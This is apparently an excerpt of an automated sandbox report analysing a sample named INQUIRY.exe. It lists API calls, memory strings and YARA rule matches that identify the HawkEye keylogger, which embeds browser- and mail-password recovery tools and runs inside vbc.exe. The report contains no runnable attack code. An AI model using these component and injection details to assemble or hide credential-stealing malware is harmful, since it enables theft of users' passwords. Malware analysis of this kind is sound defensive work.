                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044A3C8 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043A6DC NtdllDefWindowProc_A,GetCapture,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0042E904 NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00490159 NtCreateSection,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004557F8 NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0044A3C8 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0043A6DC NtdllDefWindowProc_A,GetCapture,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0042E904 NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046F74C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004759E0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044FECC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046F74C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004759E0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0044FECC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0040D426
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0040D523
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0041D5AE
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00417646
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0040D6C4
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004429BE
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00446AF4
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0046ABFC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00463C4D
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00463CBE
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0040ED03
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00463D2F
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00463DC0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0040CF92
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0041AFA6
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0048F13D
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00489976
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004F9017
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004F90A8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004A227A
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004B028E
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0043C7BC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0046F74C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004759E0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0044FECC
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00404DDB
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_0040BD8A
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00404E4C
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00404EBD
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 5_2_00404F4E
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404419
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00404516
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00413538
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004145A1
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040E639
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004337AF
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004399B1
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0043DAE7
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00405CF6
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00403F85
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00411F99
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 004035DC appears 35 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00404348 appears 78 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 004039A8 appears 40 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 004035DC appears 70 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 0040436C appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 004066E0 appears 32 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 0044BA9D appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00403E24 appears 34 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 0040C2F0 appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 00404348 appears 156 times
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: String function: 004039A8 appears 80 times
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: INQUIRY.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: INQUIRY.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656350929.00000000026C2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.655979253.0000000002270000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exeBinary or memory string: OriginalFilename vs INQUIRY.exe
                    Source: INQUIRY.exeBinary or memory string: OriginalFileName vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737328211.00000000022F2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000002.00000002.750595289.0000000002270000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.757044777.00000000026E2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756074232.0000000002160000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000011.00000002.836765666.0000000002160000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656350929.00000000026C2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.655979253.0000000002270000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exeBinary or memory string: OriginalFilename vs INQUIRY.exe
                    Source: INQUIRY.exeBinary or memory string: OriginalFileName vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737328211.00000000022F2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000002.00000002.750595289.0000000002270000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.757044777.00000000026E2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756074232.0000000002160000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000011.00000002.836765666.0000000002160000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
